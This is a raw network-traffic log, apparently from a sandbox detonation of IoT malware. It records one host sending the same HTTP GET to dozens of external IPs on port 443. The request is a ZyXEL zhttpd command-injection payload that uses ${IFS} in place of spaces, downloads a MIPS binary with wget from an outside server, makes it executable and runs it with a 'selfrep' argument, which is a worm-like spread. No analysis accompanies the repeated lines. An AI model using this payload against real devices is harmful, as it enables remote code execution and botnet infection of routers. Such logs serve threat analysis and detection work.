                                      Jan 19, 2024 17:29:52.163927078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9267192.168.2.143757898.236.237.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.163963079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9268192.168.2.14496128.1.47.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.163985968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9269192.168.2.1453610185.175.90.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.164020061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9270192.168.2.144554283.156.162.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.164061069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9271192.168.2.1438666154.225.183.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.164098024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9272192.168.2.1442608160.117.79.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.164129972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9273192.168.2.14368469.157.126.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.164159060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9274192.168.2.144661660.85.80.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.164197922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9275192.168.2.1442674172.113.98.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.164223909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9276192.168.2.144625242.175.216.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.164248943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9277192.168.2.145952273.128.207.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.164283991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9278192.168.2.1457904134.145.81.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.164315939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9279192.168.2.1456408170.103.164.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.164350986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9280192.168.2.1442544112.50.56.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.164390087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9281192.168.2.1449302163.105.61.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.164422989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9282192.168.2.1437624196.82.153.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.164477110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9283192.168.2.1448208213.24.244.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.164505005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9284192.168.2.144022039.146.39.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.164555073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9285192.168.2.1443200200.132.130.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.164593935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9286192.168.2.145686088.152.248.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.164614916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9287192.168.2.146092041.22.1.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.164632082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9288192.168.2.145838078.112.219.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.164681911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9289192.168.2.1444508222.42.171.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.164702892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9290192.168.2.1434730166.7.149.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.164748907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9291192.168.2.1444996222.120.53.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.164788961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9292192.168.2.1441362168.224.65.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.164825916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9293192.168.2.1451070135.228.245.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.164856911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9294192.168.2.144819075.8.230.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.164902925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9295192.168.2.1443608110.197.171.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.164923906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9296192.168.2.1439652217.8.38.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.164943933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9297192.168.2.1451552212.110.164.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.164993048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9298192.168.2.1445178190.186.67.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.165015936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9299192.168.2.144623625.64.112.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.165043116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9300192.168.2.1452008107.237.234.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.165096998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9301192.168.2.1455598159.56.224.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.165141106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9302192.168.2.14340901.173.168.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.165169001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9303192.168.2.145223031.13.68.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.165219069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9304192.168.2.1438036181.146.58.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.165271044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9305192.168.2.145579891.5.202.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.165306091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9306192.168.2.145850075.191.67.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.165352106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9307192.168.2.1457176101.18.108.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.165373087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9308192.168.2.1454830195.216.7.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.165416002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9309192.168.2.145218019.140.0.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.165451050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9310192.168.2.145312248.198.86.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.165483952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9311192.168.2.1435896138.73.245.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.165519953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9312192.168.2.1449630189.57.123.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.165560961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9313192.168.2.144205436.250.187.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.165586948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9314192.168.2.1439536137.236.172.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.165622950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9315192.168.2.1451336166.102.162.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.165652990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9316192.168.2.144137013.242.67.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.165704966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9317192.168.2.1440404104.194.151.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.165736914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9318192.168.2.145448038.82.133.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.165771008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9319192.168.2.1458462168.89.209.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.165838957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9320192.168.2.1449952209.254.151.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.165862083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9321192.168.2.144368249.202.130.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.165905952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9322192.168.2.145390895.246.4.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.165941954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9323192.168.2.1459456169.250.196.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.165976048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9324192.168.2.1446666216.193.49.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.166002035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9325192.168.2.145918890.214.183.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.166038990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9326192.168.2.144646025.11.82.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.166071892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9327192.168.2.144820858.234.138.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.166122913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9328192.168.2.143535689.56.193.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.166147947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9329192.168.2.1451676125.146.166.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.166187048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9330192.168.2.1455500171.60.68.167443
                                      TimestampBytes transferredDirectionData
